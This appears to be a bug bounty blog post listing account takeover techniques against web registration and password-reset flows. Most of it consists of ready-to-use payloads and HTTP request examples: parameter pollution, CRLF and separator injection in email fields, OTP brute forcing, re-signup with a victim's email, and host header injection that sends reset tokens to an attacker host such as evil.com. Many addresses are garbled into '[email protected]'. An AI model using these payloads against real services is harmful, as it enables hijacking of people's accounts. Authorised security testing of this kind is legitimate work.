Tips Account Takeover: Welcome to our in-depth guide on mastering the art of bug bounty hunting, focusing specifically on account takeover techniques. In today’s ever-evolving cybersecurity landscape, staying a step ahead of potential vulnerabilities is absolutely crucial. In this article, we’re going to dive deep into a variety of technique that revolve around exploiting account takeover vulnerabilities, with a special emphasis on the concept of “Email Replacing” during the account registration process.

We’ll also explore techniques like “Parameter Pollution” in reset password functionalities, “OTP Code Bruteforce,” “Host Header Injection,” and even the clever use of separators within parameter values, among other tactics.

Throughout this guide, we’ll provide you with real-world examples and break down the mechanics behind each technique. Our goal is to arm you with the knowledge and insights necessary to not only identify and understand these vulnerabilities, but also to ethically report them and contribute to a safer digital ecosystem.

So, whether you’re someone looking to explore the exciting world of ethical hacking or a dedicated security enthusiast, keep reading to elevate your bug bounty skills and play a vital role in ensuring online security.

1. Account Takeover Through Email Replacing when Registering Account (testing/abuse email filter)

Example:

[email protected],[email protected]
email@email“,”[email protected]
[email protected]:[email protected]
[email protected]%0d%0a[email protected]
%0d%0a[email protected]
%0a[email protected]
[email protected]%0d%0a
[email protected]%0a
[email protected]%0d
[email protected]%00
[email protected]{{}}

Example Request:

name=HACKER&email=[email protected]&email=[email protected]&username=hackerz&password=THIS_ISPASSWORD_TO_TAKEOVER&password-confirmation=THIS_ISPASSWORD_TO_TAKEOVER&_csrf_token=XXX7139a5209c08aec2dbff06f5ab5XXXXXXXXXX

2. Account Takeover Through Parameter Pollution in Reset Password

Example:

POST /passwordReset
[…]
[email protected]&[email protected]

or in JSON:

{“email”:[“[email protected]”,”[email protected]”]}

3. Account Takeover Through OTP Code Bruteforce

Example:

POST /reset
[…]
[email protected]&code=$12345$

You can use Burp Intruder.

4. Account Takeover Through Host Header Injection

Example:

POST /reset
Host: evilsite.com
[…]
[email protected]

POST /reset
Host: target.com
X-Forwarded-Host: evil.com
[…]
[email protected]

And the victim will receive the reset link email with with “token” will contail “evilsite.com“, so when the user click the link, the “token” will logged/extracted to the evilsite.com server log.

5. Account Takeover Through Using Separator in Value of the Parameter

Example:

POST /PWreset
[…]
[email protected],[email protected]

POST /PWreset
[…]
[email protected]%20[email protected]

POST /PWreset
[…]
[email protected]|[email protected]

POST /PWreset
[…]
[email protected]%00[email protected]

6. Try input No Domain in Value of the Parameter to Account Takeover

Example:

Example:

POST /registeraccount
[…]
email=victimemail

7. Try input No TLD in Email Value of the Parameter

Example:

POST /reset
[…]
[email protected]

POST /reset
[…]
[email protected]%0a%0dcc:[email protected]

8. Try Re-Sign up using Same Email

Example:

POST /newaccount
[…]
[email protected]&password=1234

After sign up using victim email, try signup again but using different password

POST /newaccount
[…]
[email protected]&password=yourehacked

9. If there is JSON data in requests, add comma and input your hacker email

Example:

POST /newaccount
[…]
{“email”:“[email protected]”,”[email protected]”,“token”:”xxxxxxxxxx”}

CLOSING

We acquired this account takeover trick from various sources, with one of them being daffainfo. Among these multiple tricks, there are a few that I have personally attempted and successfully executed. I’m optimistic that you’ll achieve success with them as well, someday. Pinterest : account takeover tips

-SECRY